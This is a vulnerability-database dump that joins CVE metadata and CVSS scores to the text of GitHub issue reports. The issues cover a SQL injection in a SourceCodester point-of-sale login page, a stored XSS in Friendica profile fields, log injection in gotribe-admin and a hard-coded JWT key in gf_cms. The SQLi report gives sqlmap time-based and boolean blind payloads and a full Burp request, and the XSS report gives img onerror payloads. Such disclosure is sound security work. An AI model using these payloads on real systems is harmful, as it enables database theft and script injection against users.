[ "89" ]
89
https://github.com/CveSecLook/cve/issues/60
[ "Exploit", "Issue Tracking" ]
github.com
[ "CveSecLook", "cve" ]
# SourceCodester Point of Sales and Inventory Management System in PHP/PDO with Full Source Code login.php V1.0 SQL injection vulnerability # NAME OF AFFECTED PRODUCT(S) + Point of Sales and Inventory Management System in PHP/PDO with Full Source Code ## Vendor Homepage + https://www.sourcecodester.com/php/14724/point-sales-and-inventory-management-system-phppdo-full-source-code.html # AFFECTED AND/OR FIXED VERSION(S) ## submitter + ## Vulnerable File + login.php ## VERSION(S) + V1.0 ## Software Link + https://www.sourcecodester.com/sites/default/files/download/janobe/pisp.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + Line 36 of the login.php file The PHP method retrieves user input from the. POST element. Then, the value of this element will be passed to the code without proper purification or validation, and ultimately in line 59 of the login.php file Used for database queries in PHP methods. This may lead to SQL injection attacks +![4](https://github.com/user-attachments/assets/378c8ee1-2d19-492e-b26c-d03fc930a0c8) ## Impact + Attackers can exploit this vulnerability to gain database privileges, which can result in a large amount of data in the database. If the other party's database has DBA privileges, it may lead to server host privileges being obtained. # DESCRIPTION + ''' has discovered that due to insufficient protection of the "email" parameter in the "\Source Code\login.php" file, "Online Institute Management System with Secure Login Algorithm using PHP/MySQLi with Source Code" there is a serious security vulnerability in the This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database. # Vulnerability details and POC ## Payload + username=admin' AND (SELECT 6620 FROM (SELECT(SLEEP(5)))jKlq) AND 'rTPQ'='rTPQ&password=admin ``` --- Parameter: username (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: username=admin' AND 9826=9826 AND 'pRDd'='pRDd&password=admin Vector: AND [INFERENCE] Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=admin' AND (SELECT 6620 FROM (SELECT(SLEEP(5)))jKlq) AND 'rTPQ'='rTPQ&password=admin Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) --- ``` ## Burp Suite (POC): ``` POST /login.php HTTP/1.1 Host: 192.168.224.136:8112 Content-Length: 93 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.224.136:8112 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.224.136:8112/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=iejrae8dm3e7gmm5io5ki7h59f Connection: close username=admin' AND (SELECT 6620 FROM (SELECT(SLEEP(5)))jKlq) AND 'rTPQ'='rTPQ&password=admin ``` +![1](https://github.com/user-attachments/assets/21e2df86-2064-4f0a-8a7d-776553a80383) + This is showing the payload implemented by running sqlmap +![2](https://github.com/user-attachments/assets/d9deeb8f-54f1-47ce-89b1-ec263b529a52) + The following is the database name displayed as a successful implementation of the attack by running sqlmap +![3](https://github.com/user-attachments/assets/1c4949e8-728b-4b01-99f1-0ce6b32a83e7)
SourceCodester Point of Sales and Inventory Management System in PHP/PDO with Full Source Code login.php V1.0 SQL injection
https://api.github.com/repos/CveSecLook/cve/issues/60/comments
0
2024-08-18T11:48:27Z
2024-08-18T11:48:27Z
https://github.com/CveSecLook/cve/issues/60
2,471,929,525
60
6,201
CVE-2024-39094
2024-08-20T14:15:09.330
Friendica 2024.03 is vulnerable to Cross Site Scripting (XSS) in settings/profile via the homepage, xmpp, and matrix parameters.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Release Notes" ], "url": "https://friendi.ca/2024/08/17/friendica-2024-08-released/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/friendica/friendica/issues/14220" }, { "source": "cve@mitre.org", "tags": [ "Release Notes" ], "url": "https://github.com/friendica/friendica/releases/tag/2024.08" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:friendica:friendica:2024.03:*:*:*:*:*:*:*", "matchCriteriaId": "2F8639D6-03C8-4E15-BB2D-4217078E983E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/friendica/friendica/issues/14220
[ "Exploit", "Issue Tracking" ]
github.com
[ "friendica", "friendica" ]
- [X] I have searched open and closed issues for duplicates ### Bug Description When a malicious Javascript payload is sent via the above mentioned parameters to the `/settings/profile` endpoint, they are stored and reflected on the `/profile/[username]` endpoint without any sanitisation, leading to XSS. ### Steps to Reproduce - Login and browse to the `Edit profile page` > `Miscellaneous` section as the attacker - set the value for `homepage` to `<img src=xss onerror="alert(1)">` - set the value for `xmpp` to `<img src=xss onerror="alert(2)">` - set the value for `matrix` to `<img src=xss onerror="alert(3)">` ![FriendicaXSS1](https://github.com/friendica/friendica/assets/28275191/ab76b3d4-fdbf-4d9c-a27a-742282667da9) - Now visit the attackers profile page by browsing as an unauthenticated/a different user to `http://<domain>/profile/<Attacker_Username>` - Notice that the three javascript payloads injected as the parmeter values were executed on behalf of the victim as seen below: ![FriendicaXSS2](https://github.com/friendica/friendica/assets/28275191/62eb2dc3-b4b6-4a8b-b93a-1906095f9573) Actual Result: - Attacker injected malicious javascript code gets executed on the victim's browser. Expected Result: - The malicious Javascript code should not be executed i.e properly sanitised input should be reflected on the page instead. ### Platform Info Friendica Version: **2024.03**
/settings/profile - Stored XSS via homepage, xmpp and matrix parameters
https://api.github.com/repos/friendica/friendica/issues/14220/comments
6
2024-06-08T23:50:18Z
2024-07-05T13:39:02Z
https://github.com/friendica/friendica/issues/14220
2,341,912,786
14,220
6,202
CVE-2024-8003
2024-08-20T14:15:10.767
A vulnerability was found in Go-Tribe gotribe-admin 1.0 and classified as problematic. Affected by this issue is the function InitRoutes of the file internal/app/routes/routes.go of the component Log Handler. The manipulation leads to deserialization. The patch is identified as 45ac90d6d1f82716f77dbcdf8e7309c229080e3c. It is recommended to apply a patch to fix this issue.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 2.7, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:A/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 5.1, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "ADJACENT", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.1, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/Go-Tribe/gotribe-admin/commit/45ac90d6d1f82716f77dbcdf8e7309c229080e3c" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/Go-Tribe/gotribe-admin/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/Go-Tribe/gotribe-admin/issues/1#issuecomment-2298187923" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.275198" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.275198" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.393987" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gotribe:gotribe-admin:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "5EF585EE-2F2A-498F-9FD5-A35321C6DD16", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/Go-Tribe/gotribe-admin/issues/1
[ "Exploit", "Issue Tracking" ]
github.com
[ "Go-Tribe", "gotribe-admin" ]
```Go r.NoRoute(func(c *gin.Context) { fmt.Printf("%s doesn't exists, redirect on /\n", c.Request.URL.Path) c.Redirect(http.StatusMovedPermanently, "/") }) ``` Flaw reason: in the ` internal/app/routes/routes go ` file of 53 line, using the ` FMT. Printf ` to print log, the log content contains the user to provide the value of (` c.R equest. URL. The Path `). This means that an attacker can execute arbitrary code in the log by controlling the URL path to inject malicious code or special characters Or cause other security risks. This is known as a log injection attack. Vulnerability POC: An attacker can attempt to inject malicious code into the log by including a specific string or snippet of code in the URL path. For example, if an application does not properly handle or escape special characters in a URL path, an attacker could exploit this vulnerability to execute arbitrary code or leak sensitive information.
Improper Output Neutralization for Logs in the routes go
https://api.github.com/repos/Go-Tribe/gotribe-admin/issues/1/comments
1
2024-08-19T12:58:04Z
2024-08-20T07:44:16Z
https://github.com/Go-Tribe/gotribe-admin/issues/1
2,473,301,960
1
6,203
CVE-2024-8003
2024-08-20T14:15:10.767
A vulnerability was found in Go-Tribe gotribe-admin 1.0 and classified as problematic. Affected by this issue is the function InitRoutes of the file internal/app/routes/routes.go of the component Log Handler. The manipulation leads to deserialization. The patch is identified as 45ac90d6d1f82716f77dbcdf8e7309c229080e3c. It is recommended to apply a patch to fix this issue.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 2.7, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:A/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 5.1, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "ADJACENT", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.1, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/Go-Tribe/gotribe-admin/commit/45ac90d6d1f82716f77dbcdf8e7309c229080e3c" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/Go-Tribe/gotribe-admin/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/Go-Tribe/gotribe-admin/issues/1#issuecomment-2298187923" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.275198" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.275198" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.393987" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gotribe:gotribe-admin:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "5EF585EE-2F2A-498F-9FD5-A35321C6DD16", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/Go-Tribe/gotribe-admin/issues/1#issuecomment-2298187923
[ "Exploit", "Issue Tracking" ]
github.com
[ "Go-Tribe", "gotribe-admin" ]
```Go r.NoRoute(func(c *gin.Context) { fmt.Printf("%s doesn't exists, redirect on /\n", c.Request.URL.Path) c.Redirect(http.StatusMovedPermanently, "/") }) ``` Flaw reason: in the ` internal/app/routes/routes go ` file of 53 line, using the ` FMT. Printf ` to print log, the log content contains the user to provide the value of (` c.R equest. URL. The Path `). This means that an attacker can execute arbitrary code in the log by controlling the URL path to inject malicious code or special characters Or cause other security risks. This is known as a log injection attack. Vulnerability POC: An attacker can attempt to inject malicious code into the log by including a specific string or snippet of code in the URL path. For example, if an application does not properly handle or escape special characters in a URL path, an attacker could exploit this vulnerability to execute arbitrary code or leak sensitive information.
Improper Output Neutralization for Logs in the routes go
https://api.github.com/repos/Go-Tribe/gotribe-admin/issues/1/comments
1
2024-08-19T12:58:04Z
2024-08-20T07:44:16Z
https://github.com/Go-Tribe/gotribe-admin/issues/1
2,473,301,960
1
6,204
CVE-2024-8005
2024-08-20T14:15:11.130
A vulnerability was found in demozx gf_cms 1.0/1.0.1. It has been classified as critical. This affects the function init of the file internal/logic/auth/auth.go of the component JWT Authentication. The manipulation leads to hard-coded credentials. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.0.2 is able to address this issue. The patch is named be702ada7cb6fdabc02689d90b38139c827458a5. It is recommended to upgrade the affected component.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/demozx/gf_cms/commit/be702ada7cb6fdabc02689d90b38139c827458a5" }, { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/demozx/gf_cms/commit/de51cc57a96ccca905c837ef925c2cc3a5241383" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/demozx/gf_cms/issues/5" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/demozx/gf_cms/issues/5#issuecomment-2296590417" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.275199" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.275199" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.393981" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:demozx:gf_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "52F0EE72-5D7B-4635-8319-3BC72516D597", "versionEndExcluding": "1.0.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "798" ]
798
https://github.com/demozx/gf_cms/issues/5
[ "Issue Tracking" ]
github.com
[ "demozx", "gf_cms" ]
func init() { service.RegisterAuth(New()) auth := jwt.New(&jwt.GfJWTMiddleware{ Realm: "test zone", Key: []byte("secret key"), Timeout: time.Minute * 5, MaxRefresh: time.Minute * 5, IdentityKey: "id", TokenLookup: "header: Authorization, query: token, cookie: jwt", TokenHeadName: "Bearer", TimeFunc: time.Now, Authenticator: Auth().Authenticator, Unauthorized: Auth().Unauthorized, PayloadFunc: Auth().PayloadFunc, IdentityHandler: Auth().IdentityHandler, }) authService = auth } In file ` internal/logic/auth/auth. ` line 37, there is a hard coded Key (Key) value, namely the "secret Key". Hard-coded credentials (such as keys, passwords, API keys, etc.) are one of the common mistakes of security development. If an attacker has access to these hard-coded credentials, they may be able to exploit them Data to access a system or service. Hard-coded credentials often lead to security risks because they make it easier for attackers to obtain sensitive information and potentially use it to perform malicious activities.
Hardcoded Secret Key in JWT Authentication Initialization
https://api.github.com/repos/demozx/gf_cms/issues/5/comments
1
2024-08-19T12:40:20Z
2024-09-02T03:04:53Z
https://github.com/demozx/gf_cms/issues/5
2,473,263,608
5
6,205
CVE-2024-8005
2024-08-20T14:15:11.130
A vulnerability was found in demozx gf_cms 1.0/1.0.1. It has been classified as critical. This affects the function init of the file internal/logic/auth/auth.go of the component JWT Authentication. The manipulation leads to hard-coded credentials. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.0.2 is able to address this issue. The patch is named be702ada7cb6fdabc02689d90b38139c827458a5. It is recommended to upgrade the affected component.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
